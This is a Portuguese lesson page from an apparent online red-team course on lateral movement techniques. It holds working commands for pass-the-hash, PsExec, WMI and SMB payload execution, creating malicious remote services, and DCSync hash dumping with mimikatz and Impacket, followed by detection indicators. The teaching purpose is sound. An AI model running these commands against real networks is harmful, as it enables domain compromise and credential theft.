0Pricing
Cyber Security Academy · Aula

Técnicas de Movimentação Lateral

Mova-se pelas redes usando WMI, PsExec, WinRM e compartilhamentos SMB sem disparar alertas.

Técnicas de Movimentação Lateral é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 3 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.

O que é movimentação lateral?

Movimentação lateral é o conjunto de técnicas que os invasores usam para avançar gradualmente por uma rede após o comprometimento inicial — passando do primeiro ponto de apoio para alvos de maior valor, como controladores de domínio, bancos de dados e sistemas de backup.

Pass-the-Hash (PtH)

A autenticação NTLM do Windows permite usar diretamente o hash da senha em vez da senha em texto simples. Um invasor que tenha extraído hashes NTLM pode se autenticar em outros sistemas sem quebrar o hash.

# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5

# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH

Pass-the-Ticket (PtT)

Os tíquetes Kerberos (TGT ou TGS) podem ser extraídos da memória e importados para autenticação como o titular do tíquete. Os ataques Golden Ticket forjam TGTs usando o hash KRBTGT, proporcionando acesso ilimitado ao domínio por meio do Kerberos.

Execução remota de código: PSExec

psexec (Sysinternals e Impacket) executa comandos em hosts Windows remotos por meio de compartilhamentos SMB administrativos. Exige credenciais de administrador. Cria um binário de serviço no alvo.

impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexec

Movimentação lateral com WMI

O Windows Management Instrumentation permite a execução remota de código sem criar arquivos detectáveis por muitas ferramentas:

# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")

SMB e compartilhamentos administrativos

Os compartilhamentos administrativos do Windows (C$, ADMIN$, IPC$) permitem a movimentação lateral com credenciais de administrador:

# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5

Serviços remotos: sc e at

Crie serviços ou tarefas agendadas em sistemas remotos:

# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc

# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"

RDP e sessões interativas

RDP (Remote Desktop Protocol, porta 3389) fornece acesso interativo completo. Os invasores usam RDP com credenciais roubadas. Defesa: restrinja o RDP a servidores de salto, exija NLA e registre todas as sessões.

# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5

SSH como movimentação lateral

Em ambientes Linux, o SSH com chaves ou credenciais roubadas permite a movimentação lateral. O abuso do encaminhamento de agentes possibilita passar por hosts comprometidos. Os túneis SSH encaminham portas para alcançar sistemas que, de outra forma, seriam inacessíveis.

# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_host

Replicação do Active Directory (DCSync)

O DCSync abusa da replicação do AD para extrair hashes de senhas diretamente do DC sem executar código nele — exige o privilégio DS-Replication-Get-Changes-All:

# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgt

Detecção de movimentação lateral

Indicadores de detecção:

  • Evento 4624 (logon) com logons incomuns do Tipo 3 (rede)
  • Criação de serviços em hosts remotos (Evento 7045)
  • Conexões SMB entre estações de trabalho
  • Criação de processos WMI em hosts remotos
  • Comportamento anormal de contas (usuário fazendo logon em várias máquinas)

Verificação rápida: movimentação lateral

Qual técnica permite que um invasor se autentique em sistemas Windows usando um hash NTLM capturado sem quebrá-lo?

Recapitulação da lição

A movimentação lateral usa credenciais e protocolos comprometidos para se espalhar pela rede. Técnicas principais: Pass-the-Hash (reutilização de hash NTLM), Pass-the-Ticket (Kerberos), PSExec/WMI/SMB para execução remota e DCSync para coleta de credenciais do domínio. Detecção: logons de rede incomuns (Evento 4624), criação de serviços remotos (Evento 7045) e tráfego SMB entre estações de trabalho.

Perguntas Frequentes

A aula “Técnicas de Movimentação Lateral” é grátis?

Sim — o texto completo de “Técnicas de Movimentação Lateral” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.

O que vou aprender em “Técnicas de Movimentação Lateral”?

Mova-se pelas redes usando WMI, PsExec, WinRM e compartilhamentos SMB sem disparar alertas. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Cyber Security Academy?

Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 3 de 4.

Quanto tempo leva a aula “Técnicas de Movimentação Lateral”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Cyber Security Academy?

Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Frameworks de C2: Cobalt Strike e Sliver
  2. Binários Living-Off-the-Land (LOLBins)
  3. Técnicas de Movimentação Lateral
  4. Redação de Relatórios de Red Team
← Voltar para Cyber Security Academy